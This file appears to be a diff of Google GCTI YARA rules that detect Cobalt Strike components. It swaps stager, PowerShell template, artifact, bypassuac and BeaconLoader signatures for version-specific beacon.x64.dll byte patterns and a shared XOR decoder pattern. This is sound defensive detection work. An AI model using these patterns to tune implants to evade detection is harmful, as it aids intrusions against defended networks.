-rule GCTI_Cobaltstrike_Resources_Httpsstager64_Bin_V3_2_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_4
 {
 	meta:
-		description = "Cobalt Strike's resources/httpsstager64.bin signature for versions v3.2 to v4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.4"
 		author = "gssincla@google.com"
-		id = "c16e73fc-484a-5f7e-8127-d85a0254d842"
+		id = "97ef152c-86c7-513c-a881-e7d594d38dcf"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager64_Bin_v3_2_through_v4_x.yara#L17-L90"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1111-L1148"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "109b8c55816ddc0defff360c93e8a07019ac812dd1a42209ea7e95ba79b5a573"
-		logic_hash = "4889a23c1f2780044b9fb2a0207676d57e82e6c1275614b684a5a9cbe984b761"
+		hash = "5a4d48c2eda8cda79dc130f8306699c8203e026533ce5691bf90363473733bf0"
+		logic_hash = "65aa42265133038f6f568c021c0228440e84e236829af50796a73f6923f46395"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$apiLocator = {
-			48 [2]
-			AC
-			41 [2] 0D
-			41 [2]
-			38 ??
-			75 ??
-			4C [4]
-			45 [2]
-			75 ??
-			5?
-			44 [2] 24
-			49 [2]
-			66 [4]
-			44 [2] 1C
-			49 [2]
-			41 [3]
-			48
-		}
-		$InternetSetOptionA = {
-			BA 1F 00 00 00
-			6A 00
-			68 80 33 00 00
-			49 [2]
-			41 ?? 04 00 00 00
-			41 ?? 75 46 9E 86
-		}
+		$version_sig = { 8B D3 48 8B CF E8 56 6F 00 00 E9 17 FB FF FF
+                     41 B8 01 00 00 00 8B D3 48 8B CF E8 41 4D 00 00
+                     48 8B 5C 24 30 48 83 C4 20 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $InternetSetOptionA
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Reverse_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_5_Hf1_And_V3_5_1
 {
 	meta:
-		description = "Cobalt Strike's resources/reverse.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.5-hf1 and 3.5.1"
 		author = "gssincla@google.com"
-		id = "182dbcd0-1180-5516-abe3-cf2eebbd0e39"
+		id = "0c0e87d3-e0e2-5ddc-9d89-5e56443da4b8"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse_Bin_v2_5_through_v4_x.yara#L17-L104"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1150-L1189"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "887f666d6473058e1641c3ce1dd96e47189a59c3b0b85c8b8fccdd41b84000c7"
-		logic_hash = "c6c4fc477c7654ec07eb6ef4c6d53805a9b4881ba288754e1f50b3e4b134333c"
+		hash = "934134ab0ee65ec76ae98a9bb9ad0e9571d80f4bf1eb3491d58bacf06d42dc8d"
+		logic_hash = "5cd69554edb91956f4ec4c3c5e55f4cd9c3665656c318220ba3a270c0bb0a690"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$ws2_32 = {
-			5D
-			68 33 32 00 00
-			68 77 73 32 5F
-		}
-		$connect = {
-			6A 10
-			5?
-			5?
-			68 99 A5 74 61
-		}
+		$version_sig = { 8B D3 48 8B CF E8 38 70 00 00 E9 FD FA FF FF
+                     41 B8 01 00 00 00 8B D3 48 8B CF E8 3F 4D 00 00
+                     48 8B 5C 24 30 48 83 C4 20 5F }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $ws2_32 and $connect
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Template_X64_Ps1_V3_0_To_V4_X_Excluding_3_12_3_13
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_6
 {
 	meta:
-		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.hint.x64.ps1 and resources/template.hint.x32.ps1 from v3.0 to v4.x except 3.12 and 3.13"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.6"
 		author = "gssincla@google.com"
-		id = "5a808113-aacb-56ca-b3ec-166c73c54b85"
+		id = "9651a1ca-d8ea-5b0b-bcba-a850c2e07791"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x64_Ps1_v3_0_to_v4_x_excluding_3_12_3_13.yara#L17-L37"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1191-L1233"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
-		logic_hash = "80823b8590004686ebd83958cad16094ea2f6958a837d87934507531a00df77a"
+		hash = "92b0a4aec6a493bcb1b72ce04dd477fd1af5effa0b88a9d8283f26266bb019a1"
+		logic_hash = "d6aff186a01386992f004cb775d280f9b6e7e16d7ecee662d61e3485b0bc088b"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = ""
 
 	strings:
-		$dda = "[AppDomain]::CurrentDomain.DefineDynamicAssembly" nocase
-		$imm = "InMemoryModule" nocase
-		$mdt = "MyDelegateType" nocase
-		$rd = "New-Object System.Reflection.AssemblyName('ReflectedDelegate')" nocase
-		$data = "[Byte[]]$var_code = [System.Convert]::FromBase64String(" nocase
-		$64bitSpecific = "[IntPtr]::size -eq 8"
-		$mandatory = "Mandatory = $True"
+		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 27
+                     0F 87 47 03 00 00 0F 84 30 03 00 00 83 F9 14
+                     0F 87 A4 01 00 00 0F 84 7A 01 00 00 83 F9 0C
+                     0F 87 C8 00 00 00 0F 84 B3 00 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact32_And_Resources_Dropper_V1_49_To_V3_14
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_7
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact32{.exe,.dll,big.exe,big.dll} and resources/dropper.exe signature for versions 1.49 to 3.14"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.7"
 		author = "gssincla@google.com"
-		id = "243e3761-cbea-561c-97da-f6ba12ebc7ee"
+		id = "27fad98a-2882-5c52-af6e-c7dcf5559624"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L17-L32"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1235-L1274"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "40fc605a8b95bbd79a3bd7d9af73fbeebe3fada577c99e7a111f6168f6a0d37a"
-		logic_hash = "437706c808bca28384a6e8e24fa3ae120a4ebe4166fa4ca3564c58b881fb23a8"
+		hash = "81296a65a24c0f6f22208b0d29e7bb803569746ce562e2fa0d623183a8bcca60"
+		logic_hash = "89499e01acd607b2fbcdd134c74ca4a901c00c7c9cf70dd241cc538c1c0d083a"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$payloadDecoder = { 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 18 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 03 [2] 0F B6 00 31 ?? 88 ?? 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 12 }
+		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 28
+                     0F 87 7F 03 00 00 0F 84 67 03 00 00 83 F9 15
+                     0F 87 DB 01 00 00 0F 84 BF 01 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		any of them
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact32_V3_1_And_V3_2
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_8
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact32{.dll,.exe,svc.exe,big.exe,big.dll,bigsvc.exe} and resources/artifact32uac(alt).dll signature for versions 3.1 and 3.2"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.8"
 		author = "gssincla@google.com"
-		id = "4fff7f42-9f50-5945-8ec0-2438ac5c7000"
+		id = "89809d81-9a8b-5cf3-a251-689bf52e98e0"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L34-L60"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1276-L1310"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "4f14bcd7803a8e22e81e74d6061d0df9e8bac7f96f1213d062a29a8523ae4624"
-		logic_hash = "7a0d33d0260c762b4aa67e4084d7474338c60aa684fd3e622614745d90350da8"
+		hash = "547d44669dba97a32cb9e95cfb8d3cd278e00599e6a11080df1a9d09226f33ae"
+		logic_hash = "8845b71ce4401fd194eb88f04dbf1f313af8b4853da004e63261ca3158fcb1d4"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 ?? 8A ?? 4? 88 }
+		$version_sig = { 8B D3 48 8B CF E8 7A 52 00 00 EB 0D 45 33 C0 8B D3 48 8B CF
+                     E8 8F 55 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact32_V3_14_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_11
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.11 (two subversions)"
 		author = "gssincla@google.com"
-		id = "8a010305-dce5-55f4-b2dd-a736721efe22"
+		id = "bf0c7661-2583-5fca-beb5-abb2b50c860d"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L62-L89"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1312-L1366"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719"
-		logic_hash = "fc5c353c568e33df80fa5bab14d11112ca211e269043b83dba8b7d1a6a008a7b"
+		hash = "64007e104dddb6b5d5153399d850f1e1f1720d222bed19a26d0b1c500a675b1a"
+		logic_hash = "9c34b23b659463a0ab92949031a9b3246aa95256d1548b2f0ad53fe3d379997d"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "815f313e0835e7fdf4a6d93f2774cf642012fd21ce870c48ff489555012e0047"
 
 	strings:
-		$pushFmtStr = {	C7 [3] 5C 00 00 00 C7 [3] 65 00 00 00 C7 [3] 70 00 00 00 C7 [3] 69 00 00 00 C7 [3] 70 00 00 00 F7 F1 C7 [3] 5C 00 00 00  C7 [3] 2E 00 00 00 C7 [3] 5C 00 00 00 }
-		$fmtStr = "%c%c%c%c%c%c%c%c%cMSSE-%d-server"
+		$version_sig = { 48 83 EC 20 41 8B D8 48 8B FA 83 F9 2D 0F 87 B2 03 00 00
+                     0F 84 90 03 00 00 83 F9 17 0F 87 F8 01 00 00
+                     0F 84 DC 01 00 00 83 F9 0E 0F 87 F9 00 00 00
+                     0F 84 DD 00 00 00 FF C9 0F 84 C0 00 00 00 83 E9 02
+                     0F 84 A6 00 00 00 FF C9 }
+		$decoder = {
+      80 34 28 ??
+      48 FF C0
+      48 3D 00 10 00 00
+      7C F1
+    }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike__Resources_Browserpivot_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_Dll_V4_0_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_12
 {
 	meta:
-		description = "Cobalt Strike's resources/browserpivot.bin from v1.48 to v3.14 and sleeve/browserpivot.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.12"
 		author = "gssincla@google.com"
-		id = "55086544-6684-526b-914f-505a562be458"
+		id = "6eeae9f4-96e0-5a98-a8dc-779c916cd968"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_Dll_v4_0_to_v4_x.yara#L17-L60"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1368-L1404"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "12af9f5a7e9bfc49c82a33d38437e2f3f601639afbcdc9be264d3a8d84fd5539"
-		logic_hash = "416554d31c105fd96aeaef508847efe2889590909c8d0025e3862e5b24078131"
+		hash = "8a28b7a7e32ace2c52c582d0076939d4f10f41f4e5fa82551e7cc8bdbcd77ebc"
+		logic_hash = "7457b20f2a7dc7e8c3317cedbcfccae30ecc8dc164188c0321f9485fdfab0f6e"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$socket_recv = {
-			FF [1-5]
-			83 ?? FF
-			74 ??
-			85 C0
-			(74 | 76) ??
-			03 ??
-			83 ?? 02
-			72 ??
-			80 ?? 3E FF 0A
-			75 ??
-			80 ?? 3E FE 0D
-		}
-		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
+		$version_sig = { 8B D3 48 8B CF E8 F8 2E 00 00 EB 16 8B D3 48 8B CF
+                     E8 00 5C 00 00 EB 0A 8B D3 48 8B CF E8 64 4F 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuac_X64_Dll_V3_3_To_V3_14_And_Sleeve_Bypassuac_X64_Dll_V4_0_And_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_13
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuac-x64.dll from v3.3 to v3.14 (64-bit version) and sleeve/bypassuac.x64.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.13"
 		author = "gssincla@google.com"
-		id = "eef83901-63d9-55a3-b115-03f420416177"
+		id = "202eb8ea-7afb-515b-9306-67514abf5e55"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_x64_Dll_v3_3_to_v3_14_and_Sleeve_Bypassuac_x64_Dll_v4_0_and_v4_x.yara#L17-L86"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1407-L1440"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "9ecf56e9099811c461d592c325c65c4f9f27d947cbdf3b8ef8a98a43e583aecb"
-		logic_hash = "d76e3601f61ae164a8df9048d59d15cd6913e64adb93132244e83f40bf67d86a"
+		hash = "945e10dcd57ba23763481981c6035e0d0427f1d3ba71e75decd94b93f050538e"
+		logic_hash = "81571a6c30802430d0df9980e005736d58464bde98c0889b48bf8d0c7e88d247"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$deleteFileCOM = {
-			48 8B [5]
-			45 33 ??
-			48 8B ??
-			FF 90 90 00 00 00
-			85 C0
-			75 ??
-			48 8B [5]
-			48 8B ??
-			FF 92 A8 00 00 00
-			85 C0
-		}
-		$copyFileCOM = {
-			48 8B [5]
-			4C 8B [5]
-			48 8B [5]
-			48 8B ??
-			4C 8B ??
-			48 89 [3]
-			FF 90 80 00 00 00
-			85 C0
-			0F 85 [4]
-			48 8B [5]
-			48 8B 11
-			FF 92 A8 00 00 00
-		}
+		$version_sig = { 48 8D 0D 01 5B FF FF 48 83 C4 28 E9 A8 54 FF FF 8B D0
+                     49 8B CA E8 22 55 FF FF }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X86_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_14
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x86.o (HeapAlloc) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.14"
 		author = "gssincla@google.com"
-		id = "0ee3fa6f-367c-596f-a3bc-3bcfa61b97aa"
+		id = "d69171e3-86f4-5187-8874-5eee2045f746"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L17-L59"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1442-L1477"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "8e4a1862aa3693f0e9011ade23ad3ba036c76ae8ccfb6585dc19ceb101507dcd"
-		logic_hash = "d02257bc556d0b1675997ab6af1b28cf5f498855d6254e3c1cd7eb4a0c4d2715"
+		hash = "297a8658aaa4a76599a7b79cb0da5b8aa573dd26c9e2c8f071e591200cf30c93"
+		logic_hash = "87cf465154d4294eeda9cf99c6c160da80cfa8a65244bc083737c0c87163431d"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "39b9040e3dcd1421a36e02df78fe031cbdd2fb1a9083260b8aedea7c2bc406bf"
 
 	strings:
-		$core_sig = {
-      C6 45 F0 48
-      C6 45 F1 65
-      C6 45 F2 61
-      C6 45 F3 70
-      C6 45 F4 41
-      C6 45 F5 6C
-      C6 45 F6 6C
-      C6 45 F7 6F
-      C6 45 F8 63
-      C6 45 F9 00
-    }
+		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 B1 1F 00 00 8B D0 49 8B CA
+                     48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X86_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_X86_V4_0_Suspected
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x86.o (MapViewOfFile) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.0 (suspected, not confirmed)"
 		author = "gssincla@google.com"
-		id = "3f7c0553-989e-53e7-87a9-3fa1c47f4b62"
+		id = "28a735c4-87d1-5e14-9379-46a6fd0cdd2a"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L61-L111"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1480-L1515"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "cded3791caffbb921e2afa2de4c04546067c3148c187780066e8757e67841b44"
-		logic_hash = "dd831fb01a403213c06e3d07daf3da5f56655619a686149f9d4beec2331fe6ca"
+		hash = "55aa2b534fcedc92bb3da54827d0daaa23ece0f02a10eb08f5b5247caaa63a73"
+		logic_hash = "0dbf6a75dc74f4c2a7604072a01e2dbaaee15f5e57c765f24138d85c248fb305"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 45 EC 4D
-      C6 45 ED 61
-      C6 45 EE 70
-      C6 45 EF 56
-      C6 45 F0 69
-      C6 45 F1 65
-      C6 45 F2 77
-      C6 45 F3 4F
-      C6 45 F4 66
-      C6 45 F5 46
-      C6 45 F6 69
-      C6 45 F7 6C
-      C6 45 F8 65
-      C6 45 F9 00
-    }
+		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 D1 B3 FF FF
+                     8B D0 49 8B CA 48 83 C4 28 E9 AF F5 FF FF 45 33 C0
+                     4C 8D 0D 8D 70 FF FF 8B D0 49 8B CA E8 9B B0 FF FF }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X86_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_1_And_V_4_2
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.1 and 4.2"
 		author = "gssincla@google.com"
-		id = "5f89c4be-f4c5-54d3-b923-d125de53902f"
+		id = "dc320d17-98fc-5df3-ba05-4d134129317e"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L114-L194"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1517-L1553"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
-		logic_hash = "19b2297986bd72204fb117560cddcfb512f5db6c157d9730b5802bf9f968eef4"
+		hash = "29ec171300e8d2dad2e1ca2b77912caf0d5f9d1b633a81bb6534acb20a1574b2"
+		logic_hash = "9b262ec18f79ab5ae63ad26d3685af088b5feb2d66de6ad3ba584cafbe2ee221"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 45 B0 56
-      C6 45 B1 69
-      C6 45 B2 72
-      C6 45 B3 74
-      C6 45 B4 75
-      C6 45 B5 61
-      C6 45 B6 6C
-      C6 45 B7 41
-      C6 45 B8 6C
-      C6 45 B9 6C
-      C6 45 BA 6F
-      C6 45 BB 63
-      C6 45 BC 00
-    }
-		$deobfuscator = {
-      8B 4D FC
-      83 C1 01
-      89 4D FC
-      8B 55 FC
-      3B 55 0C
-      73 19
-      0F B6 45 10
-      8B 4D 08
-      03 4D FC
-      0F BE 11
-      33 D0
-      8B 45 08
-      03 45 FC
-      88 10
-      EB D6
-    }
+		$version_sig = { 83 F9 34 0F 87 8E 03 00 00 0F 84 7A 03 00 00 83 F9 1C 0F 87 E6 01 00 00
+                     0F 84 D7 01 00 00 83 F9 0E 0F 87 E9 00 00 00 0F 84 CE 00 00 00 FF C9
+                     0F 84 B8 00 00 00 83 E9 02 0F 84 9F 00 00 00 FF C9 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X86_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_3
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.x86.o Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Version 4.3"
 		author = "gssincla@google.com"
-		id = "32a47966-f3bb-52c3-a977-82a1b09ddf2c"
+		id = "572616c7-d1ec-5aa1-b142-4f2edf73737f"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L196-L276"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1555-L1590"
